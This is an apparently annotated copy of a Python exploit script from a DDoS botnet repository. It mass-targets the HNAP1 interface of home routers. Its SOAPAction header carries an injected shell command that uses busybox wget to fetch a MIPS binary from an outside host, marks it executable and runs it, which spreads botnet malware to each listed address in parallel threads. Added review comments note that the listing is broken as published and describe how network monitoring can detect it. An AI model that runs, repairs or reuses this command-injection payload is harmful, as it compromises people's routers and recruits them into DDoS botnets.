R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/HNAP UPNP/hnap.py
#! python !#
import threading, sys, time, random, socket, re, os, requests
from Queue import *
from sys import stdout
from threading import Thread
ips = open(sys.argv[1], "r").readlines()
9
queue = Queue()
10
queue_count = 0
11
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
12
headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; busybox wget http://1.1.1.1/bins/mips; chmod 777 mips; ./mips hnap.exploit`'}
def hnap(host):
    # Per-target worker; main() starts one thread running this function for
    # each queued host.
    #
    # The body is written to print a progress line and then POST the
    # module-level `payload` and `headerlist` to the /HNAP1 path of the target
    # over plain HTTP, with a 5-second timeout.
    #
    # NOTE(review): the listing is not runnable as published. It is kept
    # verbatim for analysis, with only the indentation reconstructed because
    # the page extraction flattened it.
    try:
        print "Loading " + self.ip
        url = "http://" + self.ip + /HNAP1"
        # The return value is discarded: nothing inspects the response, so the
        # tool never learns whether a device was affected. For triage, a logged
        # request of this shape shows an attempt, not a confirmed compromise.
        requests.post(url, timeout=5, headers=headerlist, data=payload)

    except:
        # Bare except: every error, including connection failures and
        # timeouts, is silently swallowed.
        pass
    return
def main():
    # Entry point: queue every line of the target file, then start one
    # hnap() thread per queued host.
    #
    # NOTE(review): indentation below is reconstructed from a flattened
    # listing; statement nesting (in particular where thread.join() sits) is
    # the most plausible reading, not something the page shows.
    global queue_count
    for line in ips:
        # Drop CR / LF line endings so each entry is a bare host string.
        line = line.strip("\r")
        line = line.strip("\n")
        queue_count += 1
        # Overwrite a single console line with the running count.
        sys.stdout.write("\r[%d] Added to queue" % (queue_count))
        sys.stdout.flush()
        queue.put(line)
    sys.stdout.write("\n")
    i = 0
    while i != queue_count:
        i += 1
        try:
            input = queue.get()
            # A new thread is started for every host with no delay and no cap
            # visible in this code. On the wire this shows up as one source
            # sending POST /HNAP1 to many distinct destinations in a short
            # burst, a pattern that network monitoring can alert on.
            thread = Thread(target=hnap, args=(input,))
            thread.start()
        except KeyboardInterrupt:
            sys.exit("Interrupted? (ctrl + c)")
    # Only the most recently started thread is joined here.
    thread.join()
    return
# Run main() only when the file is executed as a script. Note that the
# target list is already read at import time by the module-level open() call.
if __name__ == "__main__":
    main()